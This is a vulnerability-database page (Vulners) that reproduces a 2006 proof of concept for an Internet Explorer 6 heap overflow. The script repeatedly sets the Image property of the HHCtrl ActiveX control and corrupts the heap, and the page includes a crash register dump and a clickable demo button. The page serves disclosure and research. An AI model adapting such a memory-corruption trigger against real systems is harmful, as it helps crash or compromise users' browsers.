Vulners
Lucene search
msie-heap.txt
`<!--
http://browserfun.blogspot.com/
The following bug was tested on the latest version of Internet Explorer 6
on a fully-patched Windows XP SP2 system. This bug is interesting because
a small heap overflow occurs each time this property is set. The bug is difficult
to detect unless heap verification has been enabled in the global debug flags
for iexplore.exe. The demonstration below results in a possibly exploitable heap
corruption after 128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
-->
<html><body><script>
// MoBB Demonstration
function Demo() {
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
</body></html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4